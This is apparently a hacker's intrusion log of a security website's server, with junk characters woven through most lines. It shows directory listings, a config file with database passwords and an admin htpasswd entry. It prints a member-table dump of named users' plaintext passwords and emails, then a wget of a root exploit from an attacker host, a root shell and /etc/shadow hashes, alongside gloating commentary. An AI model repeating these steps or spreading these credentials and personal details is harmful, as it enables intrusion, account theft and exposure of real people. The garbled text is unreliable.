- D: L* [& ^# L: X* d' [drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
& \" ?# Q% l7 z; g. xdrwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com
# a6 n, S% H; f- o: n* }, c0 kdrwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
9 x& `% j6 {' s! V3 F, ^/ u* ^drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner/ g$ w& n% i$ `6 q/ F
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg: x/ j+ k, j) u+ t, f9 k6 x1 u' d
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config0 `: [. S. U$ z! T+ t; Y" w2 V7 Z
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
; D9 o/ I- }8 x' g0 `+ Ldrwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
1 C; ?8 n- f; K% q' t4 j9 B7 |-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php. O/ A/ {1 A' R, z4 B) w
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico
& Z% J: c! r& O7 i O% bdrwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
$ v: H0 o6 E! R. O( adrwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour; ?, e4 X. |7 p
-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess
% w7 c; ]( x( }. x-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess
( X+ Z/ m1 A: T6 O" }8 w6 h-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php
' D+ L: w2 l' w+ j5 m-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html; ]. ~( P8 A9 P; E9 B
-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php' W8 U' p) C! H% H
-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php: M4 z: {7 w q* a5 x1 _
-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
4 {, d( O. E* }drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc. c" D' n( M& x! e! E) c1 p; S
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang5 T2 A3 W Y5 c! G
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
7 J# {' X. w$ u6 q: [' h9 Z R5 Mdrwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log. X7 i! ?! M. P' O# O
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
5 v, g% O0 j* Z1 @$ }* sdrwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata* D. r Z' P3 F: I8 Z" l
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new# k. H, X! W2 U! S- v3 E5 m
-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf o* d% x6 H( _4 t& ]) J
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re/ ~& \7 b, ~4 ]; I P: _2 u
-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt; }! e. ?7 ~6 ~) q
drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss
' y* P W2 d- q9 kdrwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources4 {0 S# t' V* X' c0 T
drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
' ]9 P3 A( T- H0 n. wdrwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes8 N) Z2 N3 b% Y
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
+ N, s3 C8 t; O0 bdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
" G2 u% y% Y! _* s$ _, vdrwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2' C# I m% _- Y! M. ]* g) V
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old2 K& A# o, E% z% t- k- R. r
-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php
/ ?* E3 e$ ]! J( `8 `; g+ u& n1 Cdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki
4 G' [% p1 k; W" l) j- R
& U$ L$ ~( G r* H7 r, S9 J" Y8 Qsh-3.2$ head -20 index.php: ?) s: N$ \* u, x/ S# q
<?PHP
% h. h8 V3 M6 F# Z/**
/ V- R: s5 I) T$ ?, C* Mainfile (external) for astalavistaNET v2.0) z/ ]$ n* }! T9 a2 R( g0 b2 m
*/ a0 m5 a- t2 E0 q
* @copyright Astalavista IT Engineering GmbH, A% x3 X, d; @" x* |) E8 A# R* @; [; \
* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>
6 {% l9 ?3 Q% S2 }; j& G* @version 1.0; \0 g6 c" z+ W) s
*/ ], Y$ G! {! v' H+ c4 S7 w) ]) l
( P- i8 x9 [% O' s7 x v if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {' G1 v5 @, b4 ?# o$ m
$dontStartSession = false;5 W5 R* ~, ~: {( D$ H+ c) D3 j
} else {
" q" X2 `( h& Z; R2 D' P: ?( E: I2 C; d $dontStartSession = true;
. C( E- G4 c0 M. W0 i. d/ ?* A+ h }* Y: P8 j" d6 l! m( ^$ {
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);; I/ ]! m/ C" ^4 n+ m
require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);/ D- H$ k& R2 ^# v1 l) \
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);) i' K7 `0 j: a2 \: i" X
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
& h* h+ ]4 k% g. ~
. P4 u5 `; v/ A t( y& M1 k" fsh-3.2$ cd config
) Q- x' D4 Z* @+ Q4 v8 xsh-3.2$ ls -la! y/ E% l( [9 h
total 32# C! i; X' O- ?
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .; o$ h' `( D$ u
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..% ^- C4 E% E$ G
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php
- G& s3 T0 m4 w1 Z-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php' X# X v7 ]; _' F' u$ I) Z
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php
% q/ L$ j* U O9 U6 S-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
5 e0 O+ L3 e a/ G1 F0 U" [( d-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php* V$ I( ]3 Z4 U" V
* m6 A; y* O! f5 |sh-3.2$ cat com.conf.php& R+ j- k9 t% D, g; n* U
[snip]
7 Y3 Q3 @# m) j% @; R6 U8 G- S//member-database
5 l. K# |& K8 `; R( X* f$_CONFIG['db_mem_server'] = ‘localhost’;
; X8 m8 |) S# H n' J; H# i$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;) I( L( k4 H) R1 J% ?6 }
$_CONFIG['db_mem_user'] = ‘astanet_db’;8 Z& t3 N& h# Z! ]
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;! j/ e5 I4 m6 n/ Q+ ^
$_CONFIG['db_mem_debug'] = false; //true or false
) Q" ?# \' _% o! h+ ^/ ?/ f ~5 Y//ads-database
& k; j; X6 b( q9 K. D$_CONFIG['db_ads_server'] = ‘localhost’;
3 u, G& @) ^$ x0 Q, f5 y$_CONFIG['db_ads_database'] = ‘astanet_ads’;& I7 Z8 f: O/ G
$_CONFIG['db_ads_user'] = ‘astanet_db’;
t/ `; L" n# X$ l% i$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;& |* P- f! Y9 e6 F
$_CONFIG['db_ads_debug'] = false; //true or false, T, Z" A$ k! I8 G# N
//rainbow-database( F" }& S5 P* n! F3 x! s
$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;' A* d9 |+ G" H
$_CONFIG['db_rainbow_database'] = ‘rainbow’;
+ `! B* T" }# ?$_CONFIG['db_rainbow_user'] = ‘dinu’;
6 A! ~) W; R7 q" p, o) _4 _$_CONFIG['db_rainbow_password'] = ‘dinudinu’;/ a7 C$ L0 D H( |' k, q& M
$_CONFIG['db_rainbow_debug'] = false; //true or false0 _7 |$ N9 b" ?3 q
//mailing lists database
0 L: F6 P3 w' n# y" M3 P9 @' ~+ Q$_CONFIG['db_mailing_lists_server'] = ‘localhost’;
5 L) e0 v, y6 B" O5 ~$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;1 T8 Z* o$ Y( k, `4 |0 @' ^
$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;8 m: z Y O5 N: ^$ G3 k* D; H2 B
$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
7 K A1 q2 [- N5 J8 ]# s$_CONFIG['db_mailing_lists_debug'] = false; //true or false( x* t! r N* I( v$ l7 Y: z
//paypal
( ?7 L* a! p, _1 z$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
! G; n8 [* A: R3 c z) x$_CONFIG['sub_pp_cmd'] = ‘_xclick’;$ \7 P0 I4 ?5 p2 y
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;& A0 Z" ?6 e6 C/ p. R7 w8 j- @' m; M
$_CONFIG['sub_pp_noship'] = ‘1′;
# q) G0 C: y) _" {4 L) F8 T) Y: [$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;
1 R6 r* R$ q$ `' X[snip]
# `1 a1 \9 {# z9 a9 v6 x3 t' H' ]# j1 ^, l+ A& z- z; f% S5 z- O
sh-3.2$ cd ..
/ {8 f) j1 k7 r% _' T9 Rsh-3.2$ cd member
- h: E M1 v* j# M: g6 u- t1 ssh-3.2$ ls -la+ }1 o+ r$ T- Q6 R2 k1 j
total 20& l5 N% y# N3 o9 L# ?
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
( C* X u: U; \; {drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .." o1 c8 |! X. a$ I
-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess
% n0 Y1 F2 \ ^$ g. v6 Z. K-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
, i& o. {( T, ]5 ysh-3.2$ cat .htaccess
' q( j8 M# _/ e% FSecFilterEngine off+ a1 B% W* v2 ]; X; O t
8 {% ]; U$ W( p0 p8 F2 j0 ]: n
sh-3.2$ cd ..- D% W6 r, {7 x4 F
sh-3.2$ cd cron. O3 Z; k+ U: \* p A7 `" {
sh-3.2$ ls -la
$ b# m. Y2 A1 U4 R& t) k* _( D7 Mtotal 168# s6 _, M" s n# q# o
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .+ I2 Z0 c+ j# h3 Z
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..; T C0 ^. s2 y% `
-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php/ G5 o. F7 Q% H; Q/ b5 q
-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
8 C& E/ `6 R4 K3 n; F+ e-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
6 j( n& J1 i+ L3 S3 B-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
7 T9 x* N5 w3 d5 T2 r6 N-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php* I7 G7 Q$ ~& K5 y5 K6 F+ l
-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php3 p4 c% d$ U) S8 b) Z9 E* A
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php/ z% A9 i3 p: o. C! b3 t
-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php2 ?2 e. C1 Z6 Y% n
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh3 C, r/ |( V: S) w9 \5 U# @- O0 B
-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php9 h7 V( a& F3 g2 x0 m8 P
-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php4 Y1 I; B3 ]: m4 m' t8 r% L' R+ k( H
-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
' @* M. W M: F6 x-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh4 J$ d8 Y5 S5 Z/ d
-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
: c0 u& B. W# n! W! D-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
2 K5 k `% k3 [# K, X0 p; @) T-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
1 w6 i; S# }. S1 i( c! e-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
, V m4 T* G+ V& F# ~0 L-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
3 e |+ y8 _1 C0 u/ c8 ^: m _drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
7 n, n* _9 K+ p% h$ _; P-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
7 t% Y# @+ e7 Z-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
9 n5 S A4 b5 z. H) B" z9 }
3 I' {+ h$ T. g6 p! P6 _8 Fsh-3.2$ cd ..
7 p0 D% T4 X: O6 P+ csh-3.2$ cd _007$ O% W8 ~. N) h% E! I! W
sh-3.2$ ls -la
! k6 E" g" J! {& y+ |- d- I# Ftotal 24! T3 Z# g8 D0 X$ k1 A" r7 z
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
3 f' y2 M- o# odrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
7 R; k! b% ~, w) }! P-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess
( d# f- E% k ~5 S-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php6 O$ H. ~: b' g9 k2 v" b
-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php
8 Q' J! h& Q G. z# ydrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap
" m0 ~' t! h3 ^* j" {) Q$ R) I
) }# L2 _. {! \8 q: hsh-3.2$ cat .htaccess8 O" ^7 d8 H2 C3 B- D6 u# X. c
authType Basic/ m8 N1 l; p; S/ }
authName Admin! s" t/ ]3 \: b3 b% H% m2 S5 J1 g
authUserFile /home/astanet/auth/.htadm_pwd3 j& j. Y! s- k, t8 s. U
require valid-user
+ |3 K& w& {* A1 ]
# d. i* Y' D- i V% zsh-3.2$ cat /home/astanet/auth/.htadm_pwd+ W0 N$ z4 j# l* a4 D8 d
admin2net:CR0bl65MwhfT
+ |1 U# G" ~5 u
# {5 e* [7 S2 `; S" I/ ~sh-3.2$ mysql -u astanet_db -p3 _2 n6 n0 g: z3 j7 U. E' s
Enter password:
7 t6 i' {- Z' y" TWelcome to the MySQL monitor. Commands end with ; or \g.
! p) h& O% k- e5 K3 DYour MySQL connection id is 275153
. u" H6 z) ~3 w) w' [Server version: 5.0.45-community-log MySQL Community Edition (GPL)
9 G! V3 p4 ^& H% ?7 U$ S+ Q$ A" L
8 e' }" X5 Z3 `: ?4 ?Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
8 `" h% d; [, J8 Q: |
$ x* U6 n* z9 Q3 V; Y+ U' pmysql> show databases;# z. E$ p6 P- K5 N' h
+———————–+) W. X1 d% K: ~! ~1 d
| Database |
5 e! |' f, \- d! _1 M" v+———————–+# ^; f# L4 L2 u, a- o6 h" c, U
| information_schema |" a8 t7 J' h0 Y9 H
| astanet_ads |
2 W: r5 H3 ]1 F* A, N: R+ `| astanet_mailing_lists |
6 f+ T$ i5 K1 `" r$ z| astanet_mediawiki |
Q9 D* ~9 h8 f) C| astanet_membersystem |
2 K, R M2 f& n1 [9 S/ || test |+ `" S0 T/ S( x. j
+———————–+
5 {. h6 _5 |. N6 rows in set (0.00 sec)
/ \$ {) j: I q9 u ~- c2 n& X# y: d$ o
mysql> use astanet_membersystem
% S3 F p! s* ]# M* EDatabase changed
& j! y, U5 X+ bmysql> show tables;
* j4 j- f6 ?( M; q; ^+———————————–+
( K1 e* b& ^* |* h% I3 o% p7 || Tables_in_astanet_membersystem |
: \4 K) [3 W/ J8 r8 T% Z+———————————–+$ |' g( X! N* j, y; b- I0 B O
| blacklist_categories |
* B4 E7 L8 Y7 ~( o" q. z6 f) P| blacklist_content |
0 x9 R+ {* ?- c| blacklist_levels |7 g5 ]9 A8 W+ R/ }- q( i
| blacklist_mcset |
6 y- x7 ^! \7 u9 o7 B; l% g| dir_categories |
/ N: I/ v8 h T- c; I9 N z- U: r5 }| dir_comments |
0 E' K, ^" O% q& b3 T; `| dir_links |
r% l1 {- k2 ~! N8 L| dir_temp |
+ h5 Y7 a% K9 Q| dir_votes |" v! z, L. m- D2 L# R
| documents |( n& q( ]3 Q( z0 b
| documents_categories |
5 P( S' \6 j6 y- Q' Z0 d| email_content |
# _4 `% I- M. e) o& Q* o| email_settings |3 i) \7 V9 s7 O& e. C
| exploits |
" G4 G) @& F$ C. g' Q. A1 J; v| exploits_categories |
9 A, l" e3 X' o/ ?% E0 J( {& s| exploittree_categories |
$ f( ], a+ x( Z2 N| exploittree_exploits |+ `0 P- T1 ^ o( B
| home_values |
6 u8 @. w4 H- Q7 g/ t; P' j| iso_countries |" m: I' [% A, o# Q' r, c k+ e
| links_categories |
8 F7 _0 m) o, P5 {8 Z" V0 ]% M| links_records |7 } l4 ^. u( ~# @5 D4 o" ^. R
| links_unauth |$ H7 p: h) n" ^3 O7 l, q
| links_votes |
% L* \+ C4 g# X' g7 k2 Z% s n| log |
0 Y2 W$ C; L- c% v| news_categories |
2 Q# \+ d2 ~. t4 Q, d1 }! h {| news_comments |- ^' x4 N& T- R. q& t5 N
| news_emoticons |3 w! r. L ^$ e; O9 z! }1 [( n
| news_latest |# h! p C j) C) V2 ?/ C& a$ s1 s
| news_messages |
7 I3 |3 \6 @4 U9 X8 w- l| news_statistics |
7 n/ G! p+ o% B* G| news_votes |+ O3 s5 W, B) e/ \( f
| prices_content |
6 J5 t' u6 f* t) Z( R2 r| prices_offers |
. K/ s1 F \" K$ w| rss_settings |2 z9 I9 S V9 r! w: g y
| sessions |4 i) f( |* G5 L( {
| stats_signups |
" K- C$ f7 U2 l- x0 Z$ A| u2u2 |
2 n q: ?% Y( J3 _| u2u_contact |
4 S* [/ Z4 ~, B r% X2 }$ [6 d| u2u_settings |
+ K) M4 X% N( y3 t B$ B| user_keywords_selected_categories |
2 S i, W4 z9 _4 h| users |+ r. m; b' Z$ p, S# f* \$ p
| users_ipn_test |
9 g; L1 Q8 w* C| users_keyword_values |
/ G6 e' K* i& j- G+ r| users_profile |
+ ^) x r1 |- S( \3 i| users_temp |
& O# H, `3 d1 N5 C# a7 j, M& t: J| users_upgrade |
! q9 W0 K. ~# l/ G. ~" h+———————————–+
$ Z8 a6 P. ?5 ^46 rows in set (0.00 sec). z, j. e. n0 k; p
( O, Y$ J" Z) p8 J3 Bmysql> describe users;5 m3 n y& ]- j% f4 }4 L
+————————–+————————————–+——+—–+———————+—————-+
* {' b, |& t" }# q# j| Field | Type | Null | Key | Default | Extra |
% n: `! v- O% A+————————–+————————————–+——+—–+———————+—————-+
, G9 A& w/ g2 y; N| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
# e' h9 C: n' Z( V: J# Q# _| user | varchar(50) | NO | | | |
$ @7 _2 c6 M/ ~4 }| nickname | varchar(30) | NO | MUL | anonymous | |
* J( w3 ]; B+ k2 {5 N7 e s| password | varchar(30) | NO | | | |
V7 [0 i% G4 ^/ |* t9 R% o1 J* t| userlevel | tinyint(3) | YES | MUL | NULL | |& F. u6 E$ q. _: K1 T
| exp | int(8) unsigned | NO | | 0 | |
" z6 f( i+ a! ?( H2 ^| email | varchar(50) | NO | | | |
$ x2 F" I! d- Y, ?$ Q| ip | varchar(15) | NO | | 0 | |: E+ h; g0 ]0 s% m( N# P Z
| proxy | set(’0′,’1′) | NO | | 0 | |
6 {" ?2 G: j/ V* g2 b| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
; C$ G2 A! T( x: o$ k. [1 q8 C| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |/ Z7 b/ [6 ?/ G9 @9 l2 u
| anz_in | tinyint(1) | NO | | -1 | |
. X' I* e7 v5 c5 W9 F, E" }| status | tinyint(1) unsigned | NO | | 0 | |) l) Z4 j3 W4 A" g9 J) D3 w2 n n
| checked | set(’0′,’1′,’2′) | NO | | 0 | |% ^2 W9 X; ~8 B( w: U
| freemember | set(’0′,’1′) | NO | | 0 | |0 O! v" }& g, ]0 ^, P+ O3 y
| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
9 A2 m! h/ W0 l4 [5 z. T* u| lang | tinytext | NO | | | |
* z3 v0 R5 k+ Z3 s$ x" u9 T; g| adid | smallint(6) | NO | | 0 | |6 ^' I2 e. c5 d) G
| pp_txn_id | varchar(255) | YES | | NULL | |
! d$ I6 J3 Y3 N0 i| cnb_transaction_id | varchar(255) | YES | | NULL | |
, Y( q& |: r" F7 _| cnb_order_id | varchar(255) | YES | | NULL | |0 a9 S8 d, T4 C! |0 I. V
| cnb_user_id | int(11) | YES | | 0 | |2 O' i7 M- D u4 J d
+————————–+————————————–+——+—–+———————+—————-+
2 _8 I; F+ e; Z4 q, R& [5 F/ v22 rows in set (0.01 sec)" o% J, [( U9 R8 D Z# E9 X+ S
9 d- d$ w* ?. c& L
mysql> select count(*) as skids from users;
/ Y ^( f5 z! ~; a& y% ?+——-++ ] b X# {9 ?8 X8 t3 `
| skids |
+ Z* y0 U2 v! b+ k9 J# C4 K+——-+
/ H8 r+ z/ l7 A3 H. \ |9 g& c| 25199 |
5 g3 C- E4 q7 \3 H/ X9 l4 T u+——-+9 W" a0 s" j+ X5 R& G
1 row in set (0.00 sec)
4 v/ x# G7 z) e+ x! Z; P
M9 U- t+ n7 }2 O7 B* Gmysql> select user,nickname,password,email from users where userlevel = 1;6 t) [9 N$ T$ w( W- d& b' x
+————————–+———————-+——————+———————————–+
* Y7 h: z, C2 |- f! N| user | nickname | password | email |6 ?, X0 K( M% e8 i) R
+————————–+———————-+——————+———————————–+
6 f( a0 [, q+ d( w| pascal | prozac | astaman3 | 链接标记info@astalavista.net |7 E2 O. a: x4 A, ?$ f
| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |
; X) `1 Q6 R" u5 D# j| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |: s1 c- C1 I. u. p! W; n+ v
| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |2 O2 q1 `7 e. G" v' ?/ T2 O! ?
| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |6 V% x1 [3 w: q- P: V
| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |. q+ c. E5 e" h+ s Z3 r, z0 r! x! O
| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |9 P% B, W4 |, Q' W5 {, R3 J
| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |3 C; R0 l' W& t# ?/ u0 Y' V
| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |
, }! y3 I6 _' u3 n| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |% ]6 U/ d! ^; @
| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |
" y2 |6 i5 ?' f| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |
N" _; @% ^7 O9 q, a, H| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |, B/ o O6 q) K
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |6 x+ g Z5 s& M! c O/ h! B( f: ~* T
| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |% r' |# J1 d8 J+ f( C0 o% f1 A
| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |
8 ^# d5 L7 t* a| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |. e! w+ h) y) m5 u8 N
| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |
- l! k+ l2 g% o) c' ?; Y| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |
b9 w4 L M& W9 F% c J' u| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |# ]4 Z8 u8 \9 T& G L( D
| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |5 k: ~; N" w+ F
| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |" p5 i2 ^) `, H' B. O Y
| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |
$ S4 ]& e4 @8 b; d| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |; ?6 \* @, @+ M; D1 ~
| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |4 @6 J5 x% \6 x: {4 W+ z
| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |8 B* d6 r$ M' c M9 s
| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |; O2 h! @. C G/ \( t$ u
+————————–+———————-+——————+———————————–+( T# ^1 G+ }: `
27 rows in set (0.00 sec)
! y% b! n) i- f8 f* m- y8 G5 a1 b3 q6 g2 W
mysql> exit;
4 p# U8 e/ j1 aBye
7 D5 \2 P9 | j s0 i2 G. X( S: a& u J# Y: }6 E
[~] plaintext passwords? yes,
% ~4 p( Q1 s- W: u9 \Those so called “security professionals” who charge you $6.66 / month to1 l, _/ M" n) o- B4 ^
register at their hack-proof portal, save your passwords in plaintext…# D% ?/ R! O* k2 ~* s9 t
brilliant!; Y* v& _6 L+ f7 I" Y" u, S' F
: T( [6 K# u+ S2 r) y/ v& n: ^[~] This been fun but we want more.
. J5 c7 }0 W' D2 \! r ?* q7 T- n3 S& ]
sh-3.2$ uname -a
& g E! R" K; Z: y- j! J7 NLinux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
* f9 Y+ w/ r) `sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]
7 u7 D' ~/ f$ x3 Q) g- k–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]1 ^8 V N& l# p/ [* T* q$ q9 V
Resolving anti.sec.labs… 13.33.33.37
- p! m j* ^6 D# P" SConnecting to anti.sec.labs|13.33.33.37|:80… connected.: L: O: ?' P K$ \) F% T
HTTP request sent, awaiting response… 200 OK6 U w5 m% }" g/ X1 A! r! k
Length: 18200 (18K) [text/plain]
: `6 H; m$ W1 i: _, X+ e5 WSaving to: `g0troot’; Z$ |! P! G% `; _
6 H1 ^4 I4 B. C% P) ~100%[=========================================================================================================================================>] 18,200 58.6K/s in
, L4 Y9 X& R7 @ A/ x0.3s- I4 i( k9 h$ n: J9 k
0 O- ]" v" V9 S# d3 \
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]. S6 I" `+ j+ b. U! K
4 p- u. [, f5 `+ ?$ rsh-3.2$ ./g0troot -i x86_645 Y4 Y$ @5 I6 u6 J$ _: M0 W
[+] g0troot - anti.sec.labs
/ x7 Z6 T! e9 r+ |: j, a( B[+] Target: 2.6.18-128.1.10.el52 m: f) U2 f1 O+ m/ T
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]& M, c# w. q/ F8 O8 q
, T. r4 n4 j, c/ D/ m* j
[+] r00tr00t* F% \, z5 j2 ?4 l: z
[~] Executing shell…
4 T) ]# Q# z6 C8 E6 _
, h6 ^0 q+ y! z/ |4 ish-3.2# id
# d( o/ d( Q& c5 C! Juid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)8 ^8 a# d) S! I2 o2 l
5 e" T7 g. k/ Y/ b2 B/ B
sh-3.2# cat /etc/shadow1 y: N' O0 F! [/ F2 t2 f
root 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::; S A6 N7 m$ t( d0 e
[snip]
- f4 y9 H- l; t/ Yadmin 1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
9 d. c& v( z) z& \) Yjon 1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::; U7 y, [1 e" k* M
com 1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::- O6 {1 y0 a4 i$ w/ Y
astanet 1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
$ R+ S7 h3 J$ D' Q# `( k1 F5 v( u. q! I
sh-3.2# cat /etc/motd
